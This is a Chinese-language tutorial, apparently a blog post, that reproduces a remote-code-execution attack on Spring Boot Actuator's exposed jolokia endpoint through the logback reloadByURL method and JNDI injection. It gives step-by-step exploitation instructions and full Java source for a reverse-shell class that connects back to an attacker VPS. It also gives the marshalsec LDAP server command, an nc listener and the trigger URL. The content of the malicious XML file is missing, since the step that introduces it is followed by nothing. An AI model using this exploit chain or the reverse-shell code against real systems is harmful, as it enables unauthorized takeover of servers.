Spring Boot Actuator jolokia 配置不当导致的rce漏洞

Spring Boot Actuator jolokia 配置不当导致的rce漏洞
==================================================

一、漏洞简介
————

### 利用条件:

– 目标网站存在 /jolokia 或 /actuator/jolokia 接口

– 目标使用了 jolokia-core 依赖(版本要求暂未知)并且环境中存在相关
MBean

– 目标可以请求攻击者的 HTTP 服务器(请求可出外网)

– ldap 注入可能会受目标 JDK 版本影响,jdk \< 6u201/7u191/8u182/11.0.1 二、漏洞影响 ------------ 三、复现过程 ------------ ### 漏洞原理 - 直接访问可触发漏洞的 URL,相当于通过 jolokia 调用 ch.qos.logback.classic.jmx.JMXConfigurator 类的 reloadByURL 方法 - 目标机器请求外部日志配置文件 URL 地址,获得恶意 xml 文件内容 - 目标机器使用 saxParser.parse 解析 xml 文件 (这里导致了 xxe 漏洞) - xml 文件中利用 logback 依赖的 insertFormJNDI 标签,设置了外部 JNDI 服务器地址 - 目标机器请求恶意 JNDI 服务器,导致 JNDI 注入,造成 RCE 漏洞 ### 漏洞复现 ### 步骤一:查看已存在的 MBeans 访问 **/jolokia/list** 接口,查看是否存在 **ch.qos.logback.classic.jmx.JMXConfigurator** 和 **reloadByURL** 关键词。![111.pngimg](/static/yougar/Web安全/Spring Boot/resource/SpringBootActuatorjolokia配置不当导致的rce漏洞/media/rId28.png)![222.pngimg](/static/yougar/Web安全/Spring Boot/resource/SpringBootActuatorjolokia配置不当导致的rce漏洞/media/rId29.png) ### 步骤二:托管 xml 文件 在自己控制的 vps 机器上开启一个简单 HTTP 服务器,端口尽量使用常见 HTTP 服务端口(80、443) 使用 python 快速开启 http server python2 -m SimpleHTTPServer 80 python3 -m http.server 80 在根目录放置以 xml 结尾的 ian.xml 文件,内容如下:

### 步骤三:准备要执行的 Java 代码

使用兼容低版本 jdk 的方式编译:

javac -source 1.5 -target 1.5 JNDIObject.java

然后将生成的 **JNDIObject.class** 文件拷贝到刚刚用py开启的网站根目录。

JNDIObject.java //请自行修改代码中反弹shell的ip和端口
/**
* javac -source 1.5 -target 1.5 JNDIObject.java
*
* Build By LandGrey
* */

import java.io.File;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;

public class JNDIObject {
static {
try{
String ip = “your-vps-ip”;
String port = “443”;
String py_path = null;
String[] cmd;
if (!System.getProperty(“os.name”).toLowerCase().contains(“windows”)) {
String[] py_envs = new String[]{“/bin/python”, “/bin/python3”, “/usr/bin/python”, “/usr/bin/python3”, “/usr/local/bin/python”, “/usr/local/bin/python3”};
for(int i = 0; i < py_envs.length; ++i) { String py = py_envs[i]; if ((new File(py)).exists()) { py_path = py; break; } } if (py_path != null) { if ((new File("/bin/bash")).exists()) { cmd = new String[]{py_path, "-c", "import pty;pty.spawn(\"/bin/bash\")"}; } else { cmd = new String[]{py_path, "-c", "import pty;pty.spawn(\"/bin/sh\")"}; } } else { if ((new File("/bin/bash")).exists()) { cmd = new String[]{"/bin/bash"}; } else { cmd = new String[]{"/bin/sh"}; } } } else { cmd = new String[]{"cmd.exe"}; } Process p = (new ProcessBuilder(cmd)).redirectErrorStream(true).start(); Socket s = new Socket(ip, Integer.parseInt(port)); InputStream pi = p.getInputStream(); InputStream pe = p.getErrorStream(); InputStream si = s.getInputStream(); OutputStream po = p.getOutputStream(); OutputStream so = s.getOutputStream(); while(!s.isClosed()) { while(pi.available() > 0) {
so.write(pi.read());
}
while(pe.available() > 0) {
so.write(pe.read());
}
while(si.available() > 0) {
po.write(si.read());
}
so.flush();
po.flush();
Thread.sleep(50L);
try {
p.exitValue();
break;
} catch (Exception e) {
}
}
p.destroy();
s.close();
}catch (Throwable e){
e.printStackTrace();
}
}
}

![444.pngimg](/static/yougar/Web安全/Spring Boot/resource/SpringBootActuatorjolokia配置不当导致的rce漏洞/media/rId32.png)

### 步骤四:架设恶意 ldap 服务

下载 **marshalsec** ,使用下面命令架设对应的 **ldap** 服务:

https://github.com/ianxtianxt/marshalsec

***ps:我这里发的是源码,需要用mvn编译marshalsec***

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://your-vps-ip:80/#JNDIObject 1389

### 步骤五:监听反弹 shell 的端口

nc -lvvp 你上一步代码里设置的端口

### 步骤六:从外部 URL 地址加载日志配置文件

如果目标成功请求了ian.xml 并且 marshalsec 也接收到了目标请求,但是目标没有请求 JNDIObject.class,大概率是因为目标环境的 jdk 版本太高,导致 JNDI 利用失败。

替换实际的 your-vps-ip 地址访问 URL 触发漏洞:

https://www.0-sec.org/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/your-vps-ip!/ian.xml

**服务器请求日志**![请求1.pngimg](/static/yougar/Web安全/Spring Boot/resource/SpringBootActuatorjolokia配置不当导致的rce漏洞/media/rId36.png)![请求2.pngimg](/static/yougar/Web安全/Spring Boot/resource/SpringBootActuatorjolokia配置不当导致的rce漏洞/media/rId37.png)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容